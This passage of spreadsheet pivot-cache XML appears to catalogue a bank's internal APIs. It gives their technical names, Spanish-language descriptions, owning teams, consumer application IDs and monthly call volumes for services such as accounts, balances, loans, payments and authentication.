      <sharedItems/>
    </cacheField>
    <cacheField name="VER" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="100" maxValue="1012"/>
    </cacheField>
    <cacheField name="Nombre Tecnico Api" numFmtId="0">
      <sharedItems containsBlank="1" count="488">
        <s v="No Aplica"/>
        <s v="account-accounts"/>
        <s v="account-accounts-aws"/>
        <s v="account-balances"/>
        <s v="account-balances-aws"/>
        <s v="account-fund-transfers"/>
        <s v="account-information"/>
        <s v="account-management"/>
        <s v="account-offers"/>
        <s v="account-participants"/>
        <s v="account-taxes"/>
        <s v="account-transfers"/>
        <s v="accounts-foreign-branches-account-balances"/>
        <s v="accounts-reconciliation-data-query"/>
        <s v="achfulfillment-transfers"/>
        <s v="administrative-module-file-notification"/>
        <s v="tec-administrative-module-notifications"/>
        <s v="authorization-access-authorization"/>
        <s v="bancolombia-button-transference-management"/>
        <s v="bancolombiapay-customer"/>
        <s v="bancolombiapay-otp"/>
        <s v="bancolombiapay-terms"/>
        <s v="bancolombiapay-wallet"/>
        <s v="bancolombiapay-wallet-balance"/>
        <s v="bancolombiapay-wallet-payment"/>
        <s v="bank-account-accounts-opening"/>
        <s v="bank-account-plan-changing"/>
        <s v="bill-payment-management"/>
        <s v="bill-payment-scheduled-information"/>
        <s v="bill-payment-schedules"/>
        <s v="bill-payment-information-payer"/>
        <s v="bill-paymenst-execution-payments"/>
        <s v="bill-payment-order-bills"/>
        <s v="biller-management"/>
        <s v="biller-transactions"/>
        <s v="biller-files-files-sent"/>
        <s v="biller-files-information"/>
        <s v="biller-files-management"/>
        <s v="branch-commercial-team"/>
        <s v="business-opportunities-consolidated"/>
        <s v="business-opportunities-sme-generals-inquiry"/>
        <s v="business-opportunities-sme-management"/>
        <s v="business-opportunities-sme-preapproved-inquiry"/>
        <s v="business-opportunities-masterdata"/>
        <s v="business-opportunities-persons-generals"/>
        <s v="business-opportunities-persons-management"/>
        <s v="business-opportunities-persons-preapproved"/>
        <s v="button-account"/>
        <s v="button-information"/>
        <s v="button-management"/>
        <s v="button-onboarding"/>
        <s v="button-technical-setting"/>
        <s v="credit-card-infomation"/>
        <s v="card-credit-payment-information"/>
        <s v="card-credit-payments"/>
        <s v="card-credit-transactions"/>
        <s v="card-customer-cards"/>
        <s v="card-payment-execution-credit-cards"/>
        <s v="cards-credit-card-obligations"/>
        <s v="cards-debit-cards"/>
        <s v="case-root-cause-analysis-tipology-manager"/>
        <s v="channel-service-points"/>
        <s v="channel-activity-analysis-simcard"/>
        <s v="channel-commission-customer-transactions"/>
        <s v="collection-agreements-account-collection"/>
        <s v="collection-agreements-information"/>
        <s v="consignment-modify-remittance"/>
        <s v="consignments-authorization"/>
        <s v="consignment-cancel-remittance"/>
        <s v="consignments-consult-remittance"/>
        <s v="consignments-exchange-rates-query"/>
        <s v="consignments-send-remittance"/>
        <s v="consignments-validate-automatic-credit"/>
        <s v="consumer-loan-independent-loan"/>
        <s v="consumer-loan-behavioral-models-consumption-loan-study"/>
        <s v="consumer-loans-interest-rate"/>
        <s v="consumer-loans-loan-applications"/>
        <s v="consumer-loans-offers"/>
        <s v="consumer-loans-utilities"/>
        <s v="consumption-loans-disbursements"/>
        <s v="consumption-loans-installments"/>
        <s v="contribution-models-analytic-model"/>
        <s v="control-lists-management"/>
        <s v="corporate-loan-credit-limits"/>
        <s v="correspondent-bank-banks-and-branches"/>
        <s v="counter-party-administration-master-routing-code"/>
        <s v="credit-card-administration"/>
        <s v="credit-card-credit-cards"/>
        <s v="credit-card-information"/>
        <s v="credit-card-management"/>
        <s v="credit-card-offer"/>
        <s v="credit-card-transactions"/>
        <s v="credit-cards-cards-limit"/>
        <s v="credit-cards-management"/>
        <s v="credit-cards-product-information"/>
        <s v="credit-disbursement-management"/>
        <s v="credit-limit-credit-limits-management"/>
        <s v="currency-exchange-estimate-transactions"/>
        <s v="currency-exchange-exchange-numerals"/>
        <s v="currency-exchange-negociated-rates"/>
        <s v="currency-exchange-orders"/>
        <s v="currency-exchange-rates"/>
        <s v="currency-exchange-transactions"/>
        <s v="currency-exchange-transfer-rates"/>
        <s v="currency-exchange-transaction-reasons"/>
        <s v="customer-check-control-list"/>
        <s v="customer-manage-prospect-natural-person"/>
        <s v="customer-products"/>
        <s v="customer-accounts-accounts"/>
        <s v="customer-accounts-balances"/>
        <s v="customer-acquisition-notification"/>
        <s v="customer-acquisition-persistence"/>
        <s v="customer-acquisition-documents-digitalization"/>
        <s v="customer-acquisition-identity"/>
        <s v="customer-acquisition-images-and-documents-management"/>
        <s v="customer-acquisition-information-np"/>
        <s v="customer-acquisition-management"/>
        <s v="customer-acquisition-profiling"/>
        <s v="customer-acquisition-validation"/>
        <s v="customer-authentication-otp"/>
        <s v="customer-authentication-otp-management"/>
        <s v="customer-authentication--push-messages"/>
        <s v="customer-authentication-push-messages"/>
        <s v="customer-behavioral-models-behavioral"/>
        <s v="customer-behavioral-models-indebtedness"/>
        <s v="customer-behavioral-models-payment-capacity"/>
        <s v="customer-behavioral-models-payment-obligations"/>
        <s v="customer-case-selfmanagement-cases"/>
        <s v="customer-case-pqrs"/>
        <s v="customer-commercial-data-management"/>
        <s v="customer-contact-contact-information"/>
        <s v="customer-data-keys"/>
        <s v="customer-data-management"/>
        <s v="customer-data-supplementary-information"/>
        <s v="customer-digital-information"/>
        <s v="customer-digital-identity-management"/>
        <s v="customer-digital-identity-transaction-information"/>
        <s v="customer-financial-data-financial-information"/>
        <s v="customer-financial-data-tax-information"/>
        <s v="customer-information-keys"/>
        <s v="customer-information-management-management"/>
        <s v="customer-management-amount-limit-management"/>
        <s v="customer-personal-data-information"/>
        <s v="customer-personal-summary-data-information"/>
        <s v="customer-portfolio-external-sources"/>
        <s v="customer-product-elegibility-habitat"/>
        <s v="customer-product-eligibility-vehicles"/>
        <s v="customer-product-service-eligibility"/>
        <s v="customer-products-natural-person"/>
        <s v="customer-products-relationship-management"/>
        <s v="customer-profile-information-private-external-sources"/>
        <s v="customer-profile-product-information"/>
        <s v="customer-reference-data-bank-statements"/>
        <s v="customer-relationships-data-information"/>
        <s v="customer-request-tracking"/>
        <s v="customer-risk-group"/>
        <s v="customer-risk-behavior-assessment"/>
        <s v="customer-risk-behavior-credit-registries"/>
        <s v="tec-customer-risk-validate-identity"/>
        <s v="customer-security-alias"/>
        <s v="customer-security-identity"/>
        <s v="customers"/>
        <s v="customers-case-management-customers-case"/>
        <s v="customer-validation-control-list"/>
        <s v="debit-card-administration"/>
        <s v="debit-card-debit-cards"/>
        <s v="debit-card-information"/>
        <s v="debit-card-management"/>
        <s v="debit-card-cost"/>
        <s v="debit-card-design-fares"/>
        <s v="debit-card-delivery"/>
        <s v="debit-cards-notify"/>
        <s v="deposit-account-information"/>
        <s v="deposit-account-transactions"/>
        <s v="deposit-account-transfers"/>
        <s v="deposit-fixed-information"/>
        <s v="deposit-fixed-transactions"/>
        <s v="deposit-file-processing-notification"/>
        <s v="deposit-file-processing-permission"/>
        <s v="deposits-design-catalogs"/>
        <s v="digital-document-documents"/>
        <s v="disbursement"/>
        <s v="document-management-digital-signature"/>
        <s v="document-management-digitalization"/>
        <s v="document-service-customer-documents"/>
        <s v="document-service-documents-catalog"/>
        <s v="document-service-data-files-information"/>
        <s v="document-service-data-process-data"/>
        <s v="electronic-promissory-note-management"/>
        <s v="electronic-signature"/>
        <s v="electronic-signature-simple-signature"/>
        <s v="email-notifications-send-email-message"/>
        <s v="enrollment-user-management"/>
        <s v="enrollment-users-management"/>
        <s v="enterprises-loans-utilities"/>
        <s v="factoring-obligations"/>
        <s v="fiduciary-agreement-information"/>
        <s v="fiduciary-payment-order-information"/>
        <s v="final-study"/>
        <s v="fixed-deposit-account-balances"/>
        <s v="fixed-deposit-account-frequency"/>
        <s v="fixed-deposit-account-management"/>
        <s v="fixed-deposit-account-accounts"/>
        <s v="fraud-monitoring"/>
        <s v="fraud-evaluation-fraud-monitoring"/>
        <s v="fund-administration-consolidated-balances"/>
        <s v="fund-administration-information"/>
        <s v="fund-administration-management"/>
        <s v="fund-administration-transactions"/>
        <s v="fund-administration-transfers"/>
        <s v="gwe-accounts-reconciliation-data-query"/>
        <s v="gwe-payments-qr-codes-management"/>
        <s v="gwe-account-alm-balance-query"/>
        <s v="gwe-account-alm-customer-vinculation"/>
        <s v="gwe-accounts-alm-financial-agreement"/>
        <s v="gwe-account-alm-transactions"/>
        <s v="gwe-account-alm-validation-payment-bill"/>
        <s v="gwe-account-alm-withdraw-cash"/>
        <s v="gwe-accounts-alm-account-reissue"/>
        <s v="gwe-accounts-alm-validation-nequi"/>
        <s v="gwe-cards-card-verification-code"/>
        <s v="gwe-cards-preferences"/>
        <s v="gwe-cards-customer-cards"/>
        <s v="gwe-customer-basic-information"/>
        <s v="gwe-customer-check-control-list"/>
        <s v="gwe-customer-alm-birth-date-query"/>
        <s v="gwe-customer-alm-change-email"/>
        <s v="gwe-customer-alm-customer-type-query"/>
        <s v="gwe-customer-alm-reissue-limit-validation"/>
        <s v="gwe-customer-alm-validate-customer"/>
        <s v="gwe-fraud-rsa-monitoring"/>
        <s v="gwe-JWK-wallet"/>
        <s v="gwe-legal-terms-and-conditions"/>
        <s v="gwe-loans-alm-payment"/>
        <s v="gwe-loans-alm-payment-loan-update-state"/>
        <s v="gwe-loans-alm-pre-loan-query"/>
        <s v="gwe-notification-send-email-basic"/>
        <s v="gwe-notification-send-sms-massive"/>
        <s v="gwe-oauth-alm"/>
        <s v="gwe-oauth-otp"/>
        <s v="gwe-payments-create-recharge"/>
        <s v="gwe-payments-qr-payments"/>
        <s v="gwe-payments-alm-create-pin"/>
        <s v="gwe-payments-alm-financial-agreement-light-query"/>
        <s v="gwe-payments-alm-financial-agreement-query"/>
        <s v="gwe-payments-alm-payment-bill"/>
        <s v="gwe-payments-alm-send-money"/>
        <s v="gwe-payments-alm-send-payment-receipt"/>
        <s v="gwe-register-wallet"/>
        <s v="gwe-rsk-wallet"/>
        <s v="gwe-security-alm-authentication"/>
        <s v="gwe-security-alm-change-password"/>
        <s v="gwe-security-alm-collection-otp-generation"/>
        <s v="gwe-security-alm-otp-management"/>
        <s v="gwe-security-alm-set-password"/>
        <s v="gwe-wallet-parameter-management"/>
        <s v="insurance-health-issue"/>
        <s v="insurance-health-quote"/>
        <s v="insurance-life-issue"/>
        <s v="insurance-life-quote"/>
        <s v="insurance-pets-issue"/>
        <s v="insurance-pets-quote"/>
        <s v="insurance-underwriting-cash-withdrawals"/>
        <s v="insurance-vehicle"/>
        <s v="interactive-help-frequently-asked-questions"/>
        <s v="investment-account-creation"/>
        <s v="investment-account-information"/>
        <s v="investment-account-management"/>
        <s v="investment-account-transfer"/>
        <s v="investment-channel-customer"/>
        <s v="investment-channel-management"/>
        <s v="investment-customer-personal-data-information"/>
        <s v="investment-notifications-notifications"/>
        <s v="investments-channel-customer"/>
        <s v="loan-balances"/>
        <s v="loan-disbursements"/>
        <s v="loan-loans"/>
        <s v="loan-additional-information"/>
        <s v="loan-application"/>
        <s v="loan-application-information"/>
        <s v="loan-documents-sufi"/>
        <s v="loan-utilities-installments"/>
        <s v="loans-agreements-enquiry"/>
        <s v="loans-enquiry"/>
        <s v="loans-loan-applications"/>
        <s v="loans-maximum-loan-amount"/>
        <s v="loans-payment"/>
        <s v="loans-information"/>
        <s v="simulation"/>
        <s v="loans-collaterals"/>
        <s v="management"/>
        <s v="manual-study"/>
        <s v="market-place-items"/>
        <s v="market-place-orders"/>
        <s v="market-place-schedule"/>
        <s v="loans-catalogs-master-reference"/>
        <s v="merchandising-loan-financial-renting"/>
        <s v="mortgage-loan-balances"/>
        <s v="mortgage-loan-behavioral-mortgage-loan-study"/>
        <s v="mortgage-loan-payments-constructor"/>
        <m/>
        <s v="Tec-Loans-Notification-To-Generate-Report"/>
        <s v="notifications-alert-and-notifications-information"/>
        <s v="notifications-alert-and-notifications-subscription"/>
        <s v="notifications-send-alerts-and-notifications"/>
        <s v="oauth-otp"/>
        <s v="oauth-otp-pymes"/>
        <s v="obligations-maintenance"/>
        <s v="offer-offers"/>
        <s v="operation-leasing-information"/>
        <s v="party-authentication-password-management"/>
        <s v="payment-execution-payments"/>
        <s v="payment-information"/>
        <s v="payment-leasing-information"/>
        <s v="payment-leasing-payment-management"/>
        <s v="payment-leasing-payment-transaction-leasing"/>
        <s v="payment-leasing-retrieve-payments-condition"/>
        <s v="payment-order-payment-file"/>
        <s v="payment-request-batch-information"/>
        <s v="payment-request-management"/>
        <s v="payment-request-payment-information"/>
        <s v="payments-qr-codes-management"/>
        <s v="payments-qr-management"/>
        <s v="payments-qr-payment"/>
        <s v="payments-bancolombia-logs-management"/>
        <s v="payments-transfer"/>
        <s v="payments-ach-fulfillment-customer-enrollment"/>
        <s v="payments-ach-fulfillment-transfer-management"/>
        <s v="payroll-customer"/>
        <s v="payroll-agreement-information"/>
        <s v="payroll-and-supplier-payment-payers"/>
        <s v="payroll-and-supplier-payment-beneficiaries"/>
        <s v="payroll-management-companies"/>
        <s v="payroll-management-contracts-and-wages-of-employees"/>
        <s v="payroll-management-contracts-settlement"/>
        <s v="payroll-management-customers-enrollment"/>
        <s v="payroll-management-employees"/>
        <s v="payroll-management-locations"/>
        <s v="payroll-management-payroll-concepts"/>
        <s v="payroll-management-payroll-novelties-management"/>
        <s v="payroll-management-payrolls"/>
        <s v="payroll-management-periods"/>
        <s v="payroll-management-subscription-payment-management"/>
        <s v="personal-finance-admin-management"/>
        <s v="personal-finance-budget"/>
        <s v="personal-finance-cash-management"/>
        <s v="personal-finance-creditcard-management"/>
        <s v="personal-finance-expenses-management"/>
        <s v="personal-finance-incomes-management"/>
        <s v="personal-finance-reports"/>
        <s v="personal-finance-terms"/>
        <s v="physical-point-network-service-points"/>
        <s v="pocket-information"/>
        <s v="pocket-management"/>
        <s v="pocket-transactions"/>
        <s v="pocket-transfers"/>
        <s v="point-of-service-shift-information"/>
        <s v="preliminary-study"/>
        <s v="push-notifications-customer-information"/>
        <s v="push-notifications-customer-management"/>
        <s v="push-notifications-send"/>
        <s v="qr-code-intention"/>
        <s v="QR-Management"/>
        <s v="qr-code-qr-management"/>
        <s v="query-corporate-customer"/>
        <s v="recharges-product-balance"/>
        <s v="recharges-recharges-management"/>
        <s v="reference-data-management-master-catalogue"/>
        <s v="regulatory-compliance-risk-raiting-management-scovic"/>
        <s v="sales-product-agreement-product-information"/>
        <s v="second-security-factor-information"/>
        <s v="second-security-factor-management"/>
        <s v="security-authorization-code"/>
        <s v="security-code-validation"/>
        <s v="security-encrypted-key"/>
        <s v="security-oauth-provider"/>
        <s v="security-access-entitlement-memberships"/>
        <s v="security-access-entitlement-relations"/>
        <s v="security-access-entitlement-delegates-information"/>
        <s v="security-access-entitlement-delegates-management"/>
        <s v="security-access-entitlement-owners-information"/>
        <s v="security-access-entitlement-owners-management"/>
        <s v="security-access-entitlement-privileges-information"/>
        <s v="security-access-entitlement-schemes-information"/>
        <s v="security-alphanumeric-passwords-management"/>
        <s v="security-application-event-records"/>
        <s v="security-channel-authentication-credentials"/>
        <s v="security-code-management"/>
        <s v="security-contacts-information"/>
        <s v="security-contacts-management"/>
        <s v="security-contacts-otp"/>
        <s v="security-session-id-oauth"/>
        <s v="security-session-management"/>
        <s v="security-simple-authentication-oauth"/>
        <s v="customer-investment-authentication-session-token-management"/>
        <s v="sme-credit-cards-cards-information"/>
        <s v="sms-notifications-send-sms-message"/>
        <s v="transactions"/>
        <s v="tec-commerce-portal-channel-customer-information"/>
        <s v="tec-customer-enrollment"/>
        <s v="tec-customer-general-information"/>
        <s v="tec-customer-obtain-payment-methods"/>
        <s v="tec-customer-query-contact-information"/>
        <s v="tec-customer-query-keys"/>
        <s v="tec-customer-commercial-data-query-management"/>
        <s v="tec-customer-leasing-information"/>
        <s v="tec-customer-personal-data-query-information"/>
        <s v="tec-deposit-account-balance"/>
        <s v="tec-deposit-monetary-affectation"/>
        <s v="tec-deposit-transference"/>
        <s v="tec-email-notifications-send"/>
        <s v="tec-financial-leasing-operation-information"/>
        <s v="tec-financial-operations-payments"/>
        <s v="tec-fund-administration-consolidated-balances"/>
        <s v="tec-fund-administration-transactions"/>
        <s v="tec-leasing-notification-send-reports"/>
        <s v="tec-loans-enquiry"/>
        <s v="tec-loans-loan-applications"/>
        <s v="tec-loans-maximum-loan-amount"/>
        <s v="tec-loans-collaterals"/>
        <s v="tec-payments-bancolombia-button-management"/>
        <s v="tec-payments-qr-management"/>
        <s v="tec-payments-bancolombia-logs-management"/>
        <s v="tec-security-encrypted-key"/>
        <s v="tec-token-did-consult-send"/>
        <s v="tec-transfer-management"/>
        <s v="tec-wallet-transactional-log"/>
        <s v="tec-wallet-channel-customers-customer-cards"/>
        <s v="tec-wallet-channel-customers-customer-enrollment"/>
        <s v="tec-wallet-channel-customers-customer-enrollment-history"/>
        <s v="tec-wallet-customers-customer-purchases"/>
        <s v="tec-wallet-customers-wallet-customers-management"/>
        <s v="tec-branch-commercial-team"/>
        <s v="tec-business-opportunities-generals-inquiry"/>
        <s v="tec_business_opportunities_SME_management"/>
        <s v="tec-business-opportunities-sme-preapproved-inquiry"/>
        <s v="tec-business-opportunities-masterdata"/>
        <s v="tec-business-opportunities-persons-generals"/>
        <s v="tec_business_opportunities_persons_management"/>
        <s v="tec-business-opportunities-persons-preapproved"/>
        <s v="service-points"/>
        <s v="tec-commerce-portal-transaction-log"/>
        <s v="tec-customer-amount-limit-management"/>
        <s v="tec-customer-basic-information"/>
        <s v="tec-customer-data-sufi-Management"/>
        <s v="tec-customer-data-sufi-retrieve"/>
        <s v="tec-customer-products-natural-person"/>
        <s v="tec-deposit-accounts"/>
        <s v="tec-devices-autenticate-customer-otp"/>
        <s v="tec-devices-enroll-customer-otp"/>
        <s v="tec-edpyme-channel-customer-information"/>
        <s v="tec-investments-channel-customer-information"/>
        <s v="tec-investments-channel-customers-management"/>
        <s v="tec-loans-agreements-enquiry"/>
        <s v="tec-loans-customer-information"/>
        <s v="tec-loans-sufi-management"/>
        <s v="tec-loans-sufi-retrievet"/>
        <s v="tec-mortgage-loans-obligations"/>
        <s v="tec-notifications-send-alerts-and-notifications"/>
        <s v="tec-oauth-did"/>
        <s v="tec-oauth-otp"/>
        <s v="tec-oauth-sessionid"/>
        <s v="tec-oauth-provider-from-simple-customer-authentication"/>
        <s v="tec-reference-data-management-util-reference-information"/>
        <s v="tec-security-code-validation"/>
        <s v="tec-token-management"/>
        <s v="tec-transaction-transactional-monitoring"/>
        <s v="third-party-authentication-management"/>
        <s v="third-party-authorization-information"/>
        <s v="third-party-authorization-management"/>
        <s v="token-management"/>
        <s v="otp-interno-autenticacion"/>
        <s v="trade-finance--commission-rates"/>
        <s v="transactions-limit-maximum-transaction-amounts"/>
        <s v="transactions-limits-transaction-limit-amount"/>
        <s v="transaction-transactional-monitoring"/>
        <s v="trust-trusts"/>
        <s v="vehicle-credit-final-study"/>
        <s v="vehicle-credit-manual-study"/>
        <s v="vehicle-credit-preliminary-study"/>
        <s v="vehicle-credit-study-authorization"/>
        <s v="vehicle-information"/>
        <s v="wallet-transactional-log"/>
        <s v="wallet-customers-cards"/>
        <s v="wallet-customers-enrollment"/>
        <s v="wallet-customers-enrollment-history"/>
        <s v="wallet-customers-management"/>
        <s v="wallet-customers-purchases"/>
      </sharedItems>
    </cacheField>
    <cacheField name="DESCRIPCION" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="ÁREA - COMPONENTE MAYOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="COMPONENTE MENOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="EVC" numFmtId="0">
      <sharedItems containsBlank="1" count="37">
        <s v="Financiación y consumo"/>
        <s v="Tesoreria"/>
        <s v="Depósitos y cuentas especiales"/>
        <s v="Otras Funciones de Apoyo"/>
        <s v="Gestión de flujos"/>
        <s v="Conocimiento de clientes"/>
        <s v="Distribución Digital"/>
        <s v="Evolución Digital"/>
        <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
        <s v="Medios de pago Emision"/>
        <s v="Por Definir"/>
        <s v="SUFI"/>
        <s v="Autenticación y Monitoreo"/>
        <s v="Galatea"/>
        <s v="Baas-Depositos como Servicio"/>
        <s v="Medios de pago Aceptacion"/>
        <s v="Distribución Fisica"/>
        <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
        <s v="Ciclo de Crédito"/>
        <s v="Inversiones"/>
        <s v="Leasing"/>
        <s v="Inmobiliario"/>
        <m/>
        <s v="Pymes y Empresas"/>
        <s v="Gestion integral del riesgo"/>
        <s v="ECOSISTEMAS"/>
        <s v="tu 360movilidad"/>
        <s v="Transversal I-Series y No I-Series"/>
        <s v="Inclusión"/>
        <s v="Ventas Digitales y Tecnologias de Mercadeo"/>
        <s v="Seguros"/>
        <s v="Pricing"/>
        <s v="_x0009_Apoyo al Negocio" u="1"/>
        <s v="Sin Asignar" u="1"/>
        <s v="Negocios Fiduciarios" u="1"/>
        <s v="Autenticacion y Monitoreo" u="1"/>
        <s v="Ciclo de Credito" u="1"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Tipo Productor" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Nombre Equipo" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="Nombre Dueño de Producto" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="SERVICIO PROVEEDOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="PROVEEDOR" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="CONSUMIDORES" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="Marzo" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="49937577"/>
    </cacheField>
    <cacheField name="Abril" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="87794372"/>
    </cacheField>
    <cacheField name="Mayo" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="87155684"/>
    </cacheField>
    <cacheField name="Junio" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="88695635"/>
    </cacheField>
    <cacheField name="Julio" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="103033730"/>
    </cacheField>
    <cacheField name="Opcion Tipo" numFmtId="0">
      <sharedItems/>
    </cacheField>
  </cacheFields>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{725AE2AE-9491-48be-B2B4-4EB974FC3084}">
      <x14:pivotCacheDefinition pivotCacheId="3145808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9">
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Acceder Acuerdo Trade"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="Este Servicio esta Deprecado y no tiene Documentacion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0718001 _x000d__x000a_AW0504001 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Acceder Negociaciones De Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite conocer la disponibilidad del banco para hacer la negociación de divisas, acceder a las condiciones que ofrece el banco para efectuarla y consultar la historia de negociaciones realizadas entre el banco y el cliente._x005f_x000D_ "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="MODULO PARAMETRIZADOR COMPRA Y VENTA DE DIVISAS TESORERIA_AW0899001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Accounts"/>
    <n v="135"/>
    <s v="account-accounts"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="7218059"/>
    <n v="7597970"/>
    <n v="7624365"/>
    <n v="20972492"/>
    <n v="30546239"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-13T14:16:29"/>
    <s v="Accounts AWS"/>
    <n v="110"/>
    <s v="Account - Accounts AWS"/>
    <n v="100"/>
    <s v="account-accounts-aws"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="49937577"/>
    <n v="41672613"/>
    <n v="3285668"/>
    <n v="53"/>
    <n v="22"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-05-10T22:16:36"/>
    <s v="Accounts"/>
    <n v="130"/>
    <s v="Account - Balances"/>
    <n v="110"/>
    <s v="account-balances"/>
    <s v="La API Account - Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que se posee en las Filiales del Exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="1477"/>
    <n v="5"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-13T14:16:29"/>
    <s v="Accounts AWS"/>
    <n v="110"/>
    <s v="Account - Balances AWS"/>
    <n v="101"/>
    <s v="account-balances-aws"/>
    <s v="Permite realizar las consultas de saldos de una cuenta de depósito, se puede consultar por cuenta o por todas las cuentas de un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
